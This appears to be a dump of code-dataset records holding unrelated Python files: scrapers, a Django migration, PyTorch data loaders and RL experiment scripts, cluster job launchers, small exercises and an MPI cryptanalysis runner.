measurement=\"cumulative\",\n unit=\"doses\",\n ),\n \"pfizer_vaccine_allocated\": CMU(\n category=\"pfizer_vaccine_allocated\",\n measurement=\"cumulative\",\n unit=\"doses\",\n ),\n \"janssen_vaccine_allocated\": CMU(\n category=\"janssen_vaccine_allocated\",\n measurement=\"cumulative\",\n unit=\"doses\",\n ),\n \"total_vaccine_allocated\": CMU(\n category=\"total_vaccine_allocated\",\n measurement=\"cumulative\",\n unit=\"doses\",\n ),\n }\n\n # Move things into long format\n df = df.melt(id_vars=[\"location_name\"], value_vars=crename.keys()).dropna()\n\n # Determine the category of each observation\n out = self.extract_CMU(df, crename)\n\n # Convert value columns, remove commas\n out.loc[:, \"value\"] = pd.to_numeric(out[\"value\"].str.replace(\",\", \"\"))\n\n # Add rows that don't change\n out[\"vintage\"] = self._retrieve_vintage()\n out[\"dt\"] = self._retrieve_dt(\"US/Arizona\")\n\n return out.query(\"location_name not in @non_counties\")\n","sub_path":"can_tools/scrapers/official/AZ/az_vaccine.py","file_name":"az_vaccine.py","file_ext":"py","file_size_in_byte":6459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"319890611","text":"import logging\nlogging.basicConfig(filename='E:\\\\Python\\\\Naresh_ex\\\\NT1.txt',level=logging.INFO)\n\n\ndef add(fargs,*args):\n count=0 \n sum=0\n for i in args:\n sum=sum+i\n count+=1\n print(sum+fargs)\n str='Call is made to this function with',count+1\n logging.info(str)\nadd(1,2,3)\nadd(1,2)\nadd(1,2,3,4,5)\nadd(32,343,54,65,767,8)\nadd(1,2,3,4,5,6,7)\n'''import logging\nlogging.basicConfig(filename='mylog.txt',level=logging.CRITICAL)'''\n\nlogging.critical('There is a serious problem')\nlogging.error('This is a Error message')\nprint('Program execution is done')\n","sub_path":"logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"108386194","text":"import requests\nimport json\nimport os\nfrom gtts import gTTS\nfrom datetime import datetime\n\nparams = {'id':'test'}\nres = requests.post('http://52.79.133.253/demand.php', data=params)\ntext = res.text.encode('utf8')[3:].decode('utf8')\n\nnow = datetime.strptime(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), '%Y-%m-%d %H:%M:%S')\n\ndata = json.loads(text)\ntext = \"\"\n\nfor d in data:\n s_date = datetime.strptime(d['s_date'], '%Y-%m-%d %H:%M:%S')\n e_date = datetime.strptime(d['e_date'], '%Y-%m-%d %H:%M:%S')\n\n if (now > s_date) and (now < e_date):\n text = text + d['text'] + \" ″\"\n\ntts = gTTS(text=text, lang='ko')\ntts.save(\"input_test2.mp3\")\n\n\nos.system(\"input_test2.mp3\")","sub_path":"Python/dyrntkgkd.py","file_name":"dyrntkgkd.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"170933601","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),\n ('gender', models.CharField(verbose_name='性别', blank=True, null=True, max_length=1, choices=[('M', '女'), ('F', '男')])),\n ('phone', models.CharField(null=True, blank=True, max_length=15)),\n ('email', models.CharField(null=True, blank=True, max_length=30)),\n ('ukey', models.CharField(help_text='请输入15位ukey', blank=True, null=True, validators=[django.core.validators.RegexValidator(code='nomatch', regex='^.{15}$', message='ukey长度必须为15位')], max_length=15)),\n ('user', models.OneToOneField(blank=True, null=True, related_name='profile', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'abstract': False,\n },\n ),\n ]\n","sub_path":"apps/customer/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"275601655","text":"# coding: utf-8\n\n\nimport requests\nfrom lxml import etree\nimport pandas as pd\n\n\nheaders = {\n 'Referer':'http://www.iqiyi.com/dianying/',\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n}\nresponse = requests.get('http://www.iqiyi.com/dianying_new/i_list_paihangbang.html',headers=headers).text\nhtml = etree.HTML(response)\nlis = html.xpath('//*[@id=\"widget-tab-0\"]/div[2]/div/div[1]/ul/li[1]')\n# print(lis)\n\ntitle = li.xpath('//div[@class=\"title\"]/p/a/text()')\nlink = li.xpath('//div[@class=\"title\"]/p/a/@href')\nscore_front = li.xpath('//span[@class=\"score\"]/strong/text()')\nscore_back = li.xpath('//span[@class=\"score\"]/text()')\nscore = [str(i)+str(j) for i, j in zip(score_front,score_back)]\ndescribe = li.xpath('//p[@class=\"site-piclist_info_describe\"]/text()')\ndata = {\n 'title':title,\n 'link':link,\n 'score':score,\n 'describe':describe,\n}\n\nfor i in field():\n# print(i)\n df = pd.DataFrame(i)\ndf.to_csv(\"d:\\\\desktop\\\\data.csv\")\n\n","sub_path":"aiqiyi_movies_sort.py","file_name":"aiqiyi_movies_sort.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"159057018","text":"\"\"\"\nInput Output tools for training and testing ResNet model on CIFAR100 and TinyImageNet\n\n@author: Payam Dibaeinia\n\"\"\"\nimport torchvision.transforms as transforms\nimport torchvision\nimport torch\nfrom torchvision import datasets\nimport os\n\ndef build_CIFAR100_DataLoader(data_path, train_batch_size, test_batch_size, num_workers):\n train_aug = transforms.Compose([\n transforms.RandomCrop(32, padding = 4),\n transforms.RandomHorizontalFlip(p=0.2),\n transforms.ToTensor(),\n # I followed the normalization values used in the below code:\n # https://github.com/meliketoy/wide-resnet.pytorch/blob/master/config.py\n transforms.Normalize((0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761)),\n ])\n\n test_aug = transforms.Compose([\n transforms.ToTensor(),\n # I followed the normalization values used in the below code:\n # https://github.com/meliketoy/wide-resnet.pytorch/blob/master/config.py\n transforms.Normalize((0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761)),\n ])\n\n trainset = torchvision.datasets.CIFAR100(root=data_path, train=True, download=False, transform=train_aug)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=train_batch_size, shuffle=True, num_workers=num_workers)\n\n testset = torchvision.datasets.CIFAR100(root=data_path, train=False,download=False, transform=test_aug)\n testloader = torch.utils.data.DataLoader(testset, batch_size=test_batch_size, shuffle=False, num_workers=num_workers)\n\n return trainloader, testloader\n\ndef build_TinyImageNet_DataLoader(train_path, val_path, train_batch_size, val_batch_size, num_workers):\n\n def create_val_folder(val_dir):\n \"\"\"\n This method is responsible for separating validation\n images into separate sub folders\n \"\"\"\n # path where validation data is present now\n path = os.path.join(val_dir, 'images')\n # file where image2class mapping is present\n filename = os.path.join(val_dir, 'val_annotations.txt')\n fp = open(filename, \"r\") # open file in read mode\n data = fp.readlines() # read line by line\n '''\n Create a dictionary with image names as key and\n corresponding classes as values\n '''\n val_img_dict = {}\n for line in data:\n words = line.split(\"\\t\")\n val_img_dict[words[0]] = words[1]\n fp.close()\n # Create folder if not present, and move image into proper folder\n for img, folder in val_img_dict.items():\n newpath = (os.path.join(path, folder))\n if not os.path.exists(newpath): # check if folder exists\n os.makedirs(newpath)\n # Check if image exists in default directory\n if os.path.exists(os.path.join(path, img)):\n os.rename(os.path.join(path, img), os.path.join(newpath, img))\n return\n\n\n train_aug = transforms.Compose([\n transforms.RandomCrop(64, padding = 4),\n transforms.ToTensor(),\n #transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n val_aug = transforms.Compose([\n transforms.ToTensor(),\n #transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n\n train_dataset = datasets.ImageFolder(train_path, transform = train_aug)\n trainloader = torch.utils.data.DataLoader(train_dataset, batch_size=train_batch_size, shuffle=True, num_workers=num_workers)\n\n if 'val_' in os.listdir(val_path)[0]:\n create_val_folder(val_path)\n else:\n pass\n\n val_dataset = datasets.ImageFolder(val_path, transform = val_aug)\n valloader = torch.utils.data.DataLoader(val_dataset, batch_size=val_batch_size, shuffle=False, num_workers=num_workers)\n\n return trainloader, valloader\n","sub_path":"DeepResidualNN/IOtools.py","file_name":"IOtools.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"13265797","text":"class Bug(object):\n def __init__(\n self,\n bug_id,\n product,\n bug_severity,\n priority,\n component,\n description\n ):\n self.bug_id = bug_id\n self.product = product\n self.bug_severity = bug_severity\n self.priority = priority\n self.component = component\n self.description = description\n\n\nclass TfidfBug(Bug):\n def __init__(\n self,\n bug_id,\n product,\n bug_severity,\n priority,\n component,\n description,\n description_tfidf\n ):\n super().__init__(bug_id, product, bug_severity, priority, component, description)\n self.description_tfidf = description_tfidf\n\n\nclass VectorizedBug(Bug):\n def __init__(\n self,\n bug_id,\n product,\n bug_severity,\n priority,\n component,\n description,\n product_ohe,\n bug_severity_ohe,\n priority_ohe,\n component_ohe,\n description_tfidf\n ):\n super().__init__(bug_id, product, bug_severity, priority, component, description)\n self.product_ohe = product_ohe\n self.bug_severity_ohe = bug_severity_ohe\n self.priority_ohe = priority_ohe\n self.component_ohe = component_ohe\n self.description_tfidf = description_tfidf\n","sub_path":"app/models/bugs.py","file_name":"bugs.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"70104299","text":"class Solution(object):\n def combinationSum4(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n \n dp = [0] * (target + 1)\n dp[0] = 1\n nums.sort()\n \n for i in range(target+1):\n for num in nums:\n if num > i:\n break\n if num == i:\n dp[i] += 1\n if num < i:\n # for each num in nums, take the current index - nums and add that\n # this will be changed x times where x in the number of numbers in nums\n # dp[i] is a sum of len(num) instances\n dp[i] += dp[i-num]\n \n return dp[target]\n \n # if there are 3 nums, then the result is a sum of 3 numbers\n # if there are 4 nums, then the result is a sum of 4 numbers\n # (assuming the target also isnt in nums then its just +1)\n \n ","sub_path":"lc/377.py","file_name":"377.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"313407121","text":"# coding: UTF-8\nimport urllib2\nimport json\nimport time\n\n# 天気予報ページのヘッダを設定\ncontents = u\"\"\"\n\n\n\n天気予報\n\n\"\"\"\n\n# Weather Hacksからデータ読み込み\nweather_path = \"http://weather.livedoor.com/forecast/webservice/json/v1?city=130010\"\ntime.sleep(1) # 読み込み失敗防止のため、Wait処理を掛ける\nresp = urllib2.urlopen(weather_path).read()\n\n# 読み込んだJSONデータをディクショナリ型に変換\nresp = json.loads(resp)\n\n# respデータから天気予報ページの中身を作成\ncontents += \"\"\"\n\n

%s

\n\n

\n%s\n

\n\"\"\" % (resp['title'], resp['description']['text'])\n\nfor forecast in resp['forecasts']:\n contents += \"

%s (%s) : %s

\\n\" % (forecast['dateLabel'], forecast['date'], forecast['telop'])\n\ncontents += \"\"\"\n\n\n\"\"\"\n\n# print contents # ファイルに書き込む文字列の内容を確認できます\n\n# 天気予報ページをweather.htmlに出力\nf = open('weather.html', 'w') # weather.htmlファイルを書き込みモードで開く\ntext = contents.encode('utf_8')\nf.write(text)\nf.close()\n","sub_path":"sample/ex02webAPI/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"221234640","text":"import subprocess\nimport os\nimport sys\nimport re\nfrom datetime import datetime\nimport time\ntry:\n from db_tools import dbapis, query_tools\n import db_process_upload\n import maternal_fns\nexcept:\n sys.path.append(str(os.getcwd()).rstrip('/mmr'))\n from db_tools import dbapis, query_tools\n import db_process_upload\n import maternal_fns\n\nenginer = dbapis.engine_factory()\nquery = ('SELECT cause_id FROM shared.cause_hierarchy_history '\n 'WHERE cause_set_id = 8 AND cause_set_version_id = '\n '(SELECT cause_set_version_id FROM shared.cause_set_version '\n 'WHERE cause_set_id = 8 and end_date IS NULL)')\ncauses = (query_tools.query_2_df(query, engine=enginer.engines[\"cod_prod\"])\n ['cause_id'].tolist())\n\n# set out directory\ndate_regex = re.compile('\\W')\ndate_unformatted = str(datetime.now())[0:13]\ndate_str = date_regex.sub('_', date_unformatted)\nout_dir = '/ihme/centralcomp/maternal_mortality/mmr/%s' % date_str\narc_out_dir = '%s/multi_year' % out_dir\nmmr_out_dir = '%s/single_year' % out_dir\nif not os.path.exists('%s' % out_dir):\n os.makedirs('%s' % out_dir)\nif not os.path.exists('%s' % arc_out_dir):\n os.makedirs('%s' % arc_out_dir)\nif not os.path.exists('%s' % mmr_out_dir):\n os.makedirs('%s' % mmr_out_dir)\n\nenv = 'gbd_prod'\nproc_json = db_process_upload.create_tables(env)\njson = proc_json.loc[0, 'v_return_string']\nprocess_v = int(json.split()[2].replace('\"', \"\").replace(\",\", \"\"))\nyearvals = range(1990, 2016)\n\nfor year in yearvals:\n for cause in causes:\n call = ('qsub -cwd -P proj_custom_models -N \"part1_%s_%s\" -l '\n 'mem_free=40G -pe multi_slot 20 -o '\n '/share/temp/sgeoutput/maternal '\n '-e /share/temp/sgeoutput/maternal cluster_shell.sh '\n 'mmr/01_calculate_MMR_from_draws.py \"%s\" \"%s\" \"%s\" \"%s\"'\n % (cause, year, cause, year, process_v, mmr_out_dir))\n subprocess.call(call, shell=True)\n\nmaternal_fns.wait('part1', 300)\n\nfor cause in causes:\n call = ('qsub -cwd -P proj_custom_models -N \"part2_%s\" -l '\n 'mem_free=40G -pe multi_slot 20 -o /share/temp/sgeoutput/maternal '\n '-e /share/temp/sgeoutput/maternal cluster_shell.sh '\n 'mmr/02_calculate_ARC_from_MMR.py \"%s\" \"%s\"'\n % (cause, cause, arc_out_dir))\n subprocess.call(call, shell=True)\n\nmaternal_fns.wait('part2', 300)\n\nupload_types = ['single', 'multi']\nfor u_type in upload_types:\n if u_type == 'single':\n in_dir = mmr_out_dir\n else:\n in_dir = arc_out_dir\n call = ('qsub -cwd -P proj_custom_models -N \"part3_%s\" -l mem_free=10G '\n '-pe multi_slot 5 -o /share/temp/sgeoutput/maternal '\n '-e /share/temp/sgeoutput/maternal cluster_shell.sh '\n 'mmr/03_upload.py \"%s\" \"%s\" \"%s\" \"%s\"'\n % (u_type, u_type, process_v, env, in_dir))\n subprocess.call(call, shell=True)\n time.sleep(5)\n\n","sub_path":"maternal/fatal/mmr/00_MMR_master.py","file_name":"00_MMR_master.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"561461184","text":"import os\nimport yaml\nimport numpy as np\nfrom .operators import get_best_individual\nfrom scipy.optimize import OptimizeResult\n\ndef load_config(path='config.yaml'):\n with open(path) as fp:\n config = yaml.load(fp)\n return config\n\n\ndef get_optimization_results(\n t,\n population,\n factorial_cost,\n scalar_fitness,\n skill_factor,\n pairs=None,\n tasks=None):\n K = len(set(skill_factor))\n N = len(population) // 2\n results = []\n for k in range(K):\n result = OptimizeResult()\n x, fun = get_best_individual(\n population, factorial_cost, scalar_fitness, skill_factor, k)\n result.x = x\n result.fun = fun\n result.nit = t\n result.nfev = (t + 1) * N\n if pairs is not None:\n result.pair = pairs[k, :]\n else:\n result.pair = None\n if tasks is not None:\n result.ucb_value = tasks[k].ucb_solver.value\n else:\n result.ucb_value = None\n results.append(result)\n return results\n\nROOT = '../../result'\n\ndef create_result_folder(args):\n # folder for root\n if not os.path.exists(ROOT):\n os.mkdir(ROOT)\n # folder for benchmark\n folder = os.path.join(ROOT, '{}'.format(args.benchmark_id))\n if not os.path.exists(folder):\n os.mkdir(folder)\n # folder for algorithm\n folder = os.path.join(folder, '{}_{:0.1f}'.format(args.algorithm.__name__, args.rmp))\n if not os.path.exists(folder):\n os.mkdir(folder)\n return folder\n\ndef save(Results, args):\n folder = create_result_folder(args)\n path = os.path.join(folder, 'fitness-{}.npy'.format(args.seed))\n X = np.array([[res.fun for res in results] for results in Results])\n np.save(path, X)\n\n path = os.path.join(folder, 'pair-selection-{}.npy'.format(args.seed))\n X = np.array([[res.pair for res in results] for results in Results])\n np.save(path, X)\n\n path = os.path.join(folder, 'ucb-value-{}.npy'.format(args.seed))\n X = np.array([[res.ucb_value for res in results] for results in Results])\n np.save(path, X)\n","sub_path":"code/ma2bea/optimizer/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"485654941","text":"\nimport numpy as np\nfrom ndp.arguments import *\nimport copy\nimport glob\nimport os\nimport time\nfrom collections import deque\nfrom datetime import datetime\nimport torch.nn.functional as F\nimport gym\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport tensorflow as tf\n\nfrom ndp.pytorch_a2c_ppo_acktr_gail.a2c_ppo_acktr import algo, utils\nfrom ndp.pytorch_a2c_ppo_acktr_gail.a2c_ppo_acktr.envs import make_vec_envs\nfrom ndp.pytorch_a2c_ppo_acktr_gail.a2c_ppo_acktr.model import Policy, DMPPolicy\nfrom ndp.pytorch_a2c_ppo_acktr_gail.a2c_ppo_acktr.storage import RolloutStorage, RolloutStorageDMP\nfrom ndp.pytorch_a2c_ppo_acktr_gail.ppo_train import train as train_ppo\nfrom ndp.pytorch_a2c_ppo_acktr_gail.dmp_train import train as train_dmp\nfrom ndp.pytorch_a2c_ppo_acktr_gail.a2c_ppo_acktr.algo.ppo import PPODMP\n\nfrom rlkit.core import logger as rlkit_logger\nfrom rlkit.core.eval_util import create_stats_ordered_dict\n\ndef dmp_experiment(variant):\n env_name = variant[\"env_name\"]\n env_suite = variant[\"env_suite\"]\n env_kwargs = variant[\"env_kwargs\"]\n seed = variant[\"seed\"]\n\n log_dir = os.path.expanduser(rlkit_logger.get_snapshot_dir())\n utils.cleanup_log_dir(log_dir)\n\n device = torch.device(\"cpu\")\n\n torch.backends.cudnn.benchmark = True\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\n torch.set_num_threads(1)\n\n envs = make_vec_envs(\n env_suite,\n env_name,\n env_kwargs,\n seed,\n variant[\"num_processes\"],\n variant[\"rollout_kwargs\"][\"gamma\"],\n rlkit_logger.get_snapshot_dir(),\n device,\n False,\n )\n\n test_envs = make_vec_envs(\n env_suite,\n env_name,\n env_kwargs,\n seed,\n 5,\n None,\n rlkit_logger.get_snapshot_dir(),\n device,\n False,\n )\n\n dmp_kwargs = variant['dmp_kwargs']\n dmp_kwargs['l'] = variant['num_int_steps'] // dmp_kwargs['T'] + 1\n\n actor_critic = DMPPolicy(\n envs.observation_space.shape,\n envs.action_space,\n base_kwargs=dmp_kwargs,\n )\n actor_critic.to(device)\n\n agent = PPODMP(actor_critic, **variant[\"algorithm_kwargs\"])\n\n rollouts = RolloutStorageDMP(\n variant[\"num_steps\"],\n variant[\"num_processes\"],\n envs.observation_space.shape,\n envs.action_space,\n actor_critic.recurrent_hidden_state_size,\n T=dmp_kwargs['T'],\n )\n\n train_dmp(actor_critic, agent, rollouts, envs, test_envs, device, variant)\n\n\ndef ppo_experiment(args):\n\n\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed_all(args.seed)\n device = torch.device(\"cuda:0\" if args.cuda else \"cpu\")\n\n\n if args.cuda and torch.cuda.is_available() and args.cuda_deterministic:\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n env_kwargs = dict()\n\n env_kwargs['timestep'] = args.timestep\n\n if \"push\" in args.env_name:\n env_kwargs['params'] = 'random_goal_unconstrained'\n\n if \"soccer\" in args.env_name:\n env_kwargs['params'] = 'random_goal_unconstrained'\n\n if \"faucet\" in args.env_name:\n secondary_output = True\n\n env_kwargs=dict(\n dense=False,\n image_obs=False,\n action_scale=1,\n control_mode=\"end_effector\",\n frame_skip=40,\n target_mode=False,\n usage_kwargs=dict(\n use_dm_backend=True,\n use_raw_action_wrappers=False,\n use_image_obs=False,\n max_path_length=280,\n ),\n image_kwargs=dict(),\n )\n env_name = \"kettle\"\n test_envs = make_vec_envs(\n 'kitchen',\n env_name,\n env_kwargs,\n args.seed,\n 5,\n None,\n args.log_dir,\n device,\n False,\n )\n envs = make_vec_envs(\n 'kitchen',\n env_name,\n env_kwargs,\n args.seed,\n args.num_processes,\n args.gamma,\n args.log_dir,\n device,\n False,\n )\n\n\n # envs = make_vec_envs(args.env_name, args.seed, args.num_processes,\n # args.gamma, args.log_dir, device, False, env_kwargs=env_kwargs)\n\n # test_envs = make_vec_envs(args.env_name, args.seed + args.num_processes, args.num_processes,\n # None, args.log_dir, device, False, env_kwargs=env_kwargs)\n\n actor_critic = Policy(\n envs.observation_space.shape,\n envs.action_space,\n base_kwargs={'recurrent': args.recurrent_policy, 'hidden_size':args.hidden_size, 'hidden_activation':'relu'})\n actor_critic.to(device)\n\n agent = algo.PPO(\n actor_critic,\n args.clip_param,\n args.ppo_epoch,\n args.num_mini_batch,\n args.value_loss_coef,\n args.entropy_coef,\n lr=args.lr,\n eps=args.eps,\n max_grad_norm=args.max_grad_norm)\n\n\n\n rollouts = RolloutStorage(args.num_steps, args.num_processes,\n envs.observation_space.shape, envs.action_space,\n actor_critic.recurrent_hidden_state_size)\n\n train_ppo(actor_critic, agent, rollouts, envs, test_envs, args)\n\nif __name__ == '__main__':\n args = get_args_ppo()\n full_path = os.path.realpath(__file__)\n path, filename = os.path.split(full_path)\n exp_id = args.expID\n if args.name:\n args.save_dir = path + '/data/' + args.name + '/' + str('{:05d}'.format(exp_id)) + '_' + args.type + '_' + args.env_name + '_s'\n else:\n args.save_dir = path + '/data/' + str('{:05d}'.format(exp_id)) + '_' + args.type + '_' + args.env_name + '_s'\n os.environ[\"OPENAI_LOGDIR\"] = args.save_dir + '/tmp/'\n args.log_dir = args.save_dir + '/tmp/'\n args.num_env_steps = 25000 * args.num_processes * args.num_steps\n\n args.save_dir += '_T_' + str(args.T) + '_N_' + str(args.N) + '_rd_' + str(args.reward_delay)+ '_az_' + str(args.a_z) + '_cp_' + str(args.clip_param) + '_hs_' + str(args.hidden_size)\n\n os.makedirs(args.save_dir, exist_ok=True)\n\n if args.type == 'dmp':\n env_name = args.env_name\n args.env_name += '_pos'\n args.goal_type = 'int_path'\n dmp_experiment(args)\n\n if args.type == 'ppo':\n env_name = args.env_name\n args.env_name += '_pos'\n ppo_experiment(args)\n\n if args.type == 'ppo-multi':\n env_name = args.env_name\n args.env_name += '_pos'\n args.goal_type = 'multi_act'\n dmp_experiment(args)\n","sub_path":"ndp/main_rl.py","file_name":"main_rl.py","file_ext":"py","file_size_in_byte":6595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"158275362","text":"# -*- coding: utf-8 -*-\n\"\"\"\nQuestion:\nGiven a string, determine if it is a palindrome, considering only alphanumeric characters and ignoring cases.\nFor example,\n\"A man, a plan, a canal: Panama\" is a palindrome. \"race a car\" is not a palindrome.\n\"\"\"\n# Have two pointes one at the start and the other at the end\ndef is_palindrome(string):\n\ti = 0\n\tj = len(string) - 1\n\twhile (i < j):\n\t\tleft = string[i]\n\t\tright = string[j]\n\t\tif left.isalpha() == False:\n\t\t\ti += 1\n\t\t\tcontinue\n\t\telif right.isalpha() == False:\n\t\t\tj -= 1\n\t\t\tcontinue\n\t\telse:\n\t\t\tleft = left.lower()\n\t\t\tright = right.lower()\n\n\t\tif left == right:\n\t\t\ti += 1\n\t\t\tj -= 1\n\t\telse:\n\t\t\tprint(\"%s %s mismatch. %s is not a palindrome\" % (left, right, string))\n\t\t\treturn\n\tprint(\"%s is a palindrome\" % string)\n\n#is_palindrome('malayalam')\nis_palindrome('A man, a plan, a canal: Panama')","sub_path":"strings/04_valid_palindrome.py","file_name":"04_valid_palindrome.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"504326815","text":"\"\"\" This module will test the views file \"\"\"\nfrom flask_testing import TestCase\nfrom tests.service import manage_send_answer\n\n\nclass TestViews(TestCase):\n \"\"\"\n this class is used for testing the render template method\n by using library flask testing\n \"\"\"\n\n render_templates = False\n\n def create_app(self):\n\n from app.views import app\n app.config['TESTING'] = True\n return app\n\n def test_return_index_template(self): # REQUIRE BLINKER LIBRARY TO WORK\n\n response = self.client.get(\"/\")\n assert response.status_code == 200\n self.assert_template_used('index.html')\n\n def test_assert_not_process_the_template(self):\n response = self.client.get(\"/\")\n assert b\"\" == response.data\n\n\ndef test_send_answer():\n \"\"\"\n this method will test an imitation of the Ajax route method\n this method is in the service file\n It globably test that the all back-end is correctly working\n \"\"\"\n\n result = manage_send_answer(\n \"Salut grandpy ! je rêve d'aller visiter mulhouse !\")\n for element in result['answer']:\n assert \"Mulhouse (/myluz/) est une commune française\" in element\n\n assert result['lat'] == '47.749481'\n assert result['lng'] == '7.33994'\n","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"178249797","text":"import argparse\nimport numpy as np\nfrom mpi4py import MPI\nfrom time import time as now\n\nfrom constants import static\nfrom model.backdoor import Backdoor\nfrom configuration import configurator\nfrom output.module.logger import Logger\nfrom output.module.debugger import Debugger\nfrom model.case_generator import CaseGenerator\nfrom constants.runtime import runtime_constants as rc\nfrom util.parse.cnf_parser import CnfParser\n\nparser = argparse.ArgumentParser(description='CryptoEv')\nparser.add_argument('keygen', type=str, help='key generator')\nparser.add_argument('backdoor', type=str, help='load backdoor from specified file')\nparser.add_argument('times', type=int, help='how many times repeat evaluating')\nparser.add_argument('-cp', metavar='tag/path', type=str, default=\"true\", help='tag or path to configuration file')\nparser.add_argument('-v', metavar='0', type=int, default=0, help='[0-3] verbosity level')\nparser.add_argument('-d', '--description', metavar='str', default=\"\", type=str, help='experiment description')\n\nparser.add_argument('-md', '--mpi_debug', metavar='0', type=bool, default=False, help='debug file for all nodes')\n\nargs = parser.parse_args()\npath, configuration = configurator.load(args.cp, mpi=True)\nkey_generator = configurator.get_key_generator(args.keygen)\nrc.configuration = configuration\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\n# output\nif rank == 0:\n output = configuration[\"output\"]\n output.create(\n key_generator=key_generator.tag,\n description=args.description,\n conf_path=path,\n )\n\n# backdoor\nbackdoors = Backdoor.load(args.backdoor)\nfor backdoor in backdoors:\n backdoor.check(key_generator)\n\n# solvers\nsolvers = configuration[\"solvers\"]\nfor solver in solvers:\n solver.check_installation()\n\n# random state\nif rank == 0:\n ri_list = np.random.randint(2 ** 32 - 1, size=size)\nelse:\n ri_list = []\nri_list = comm.bcast(ri_list, root=0)\nrs = np.random.RandomState(ri_list[rank])\n\n# case_generator\ncnf_path = static.cnfs[key_generator.tag]\nrc.cnf = CnfParser().parse_for_path(cnf_path)\n\nrc.case_generator = CaseGenerator(\n random_state=rs,\n algorithm=key_generator,\n)\n\npredictive_f = rc.configuration[\"predictive_function\"]\npredictive_f.selection.set_mpi_sett(size, rank)\nsolver = solvers.get(\"main\")\nfor i in range(len(backdoors)):\n if rank == 0:\n rc.logger = Logger('%s_%d' % (output.get_log_path(), i))\n rc.debugger = Debugger('%s_%d' % (output.get_debug_path(), i), args.v)\n\n if args.mpi_debug:\n df = rc.debugger.debug_file if rank == 0 else \"\"\n df = comm.bcast(df, root=0)\n if rank != 0:\n rc.debugger = Debugger(\"%s_%d\" % (df, rank), args.v)\n\n # print header\n if rank == 0:\n rc.logger.deferred_write(\"-- key generator: %s\\n\" % args.keygen)\n rc.logger.deferred_write(\"-- %s\\n\" % solvers)\n rc.logger.deferred_write(\"-- pf type: %s\\n\" % predictive_f.type)\n rc.logger.deferred_write(\"-- time limit: %s\\n\" % solvers.get_tl(\"main\"))\n rc.logger.deferred_write(\"-- selection: %s\\n\" % predictive_f.selection)\n rc.logger.deferred_write(\"-- backdoor: %s\\n\" % backdoors[i])\n rc.logger.write(\"------------------------------------------------------\\n\")\n\n solver.reset_params()\n for it in range(args.times):\n start_work_time = now()\n c_out = predictive_f.compute(backdoors[i])\n cases = comm.gather(c_out[0], root=0)\n\n if rank == 0:\n cases = np.concatenate(cases)\n\n time = now() - start_work_time\n r = predictive_f.calculate(backdoors[i], (cases, time))\n\n rc.logger.write(\"------------------------------------------------------\\n\", \"iteration step: %d\\n\" % it)\n rc.logger.write('options: %s\\n' % solver.options)\n value, pf_log = r[0], r[1]\n rc.logger.write(pf_log)\n rc.logger.write(\"true value: %.7g\\n\" % value)\n\n solver.options.rnd()\n options_str = str(solver.options)\n else:\n options_str = \"\"\n\n options_str = comm.bcast(options_str, root=0)\n if rank != 0:\n solver.options.set(options_str)\n rc.debugger.write(2, 1, \"been received params: %s\" % options_str)\n\n\nif rank == 0:\n 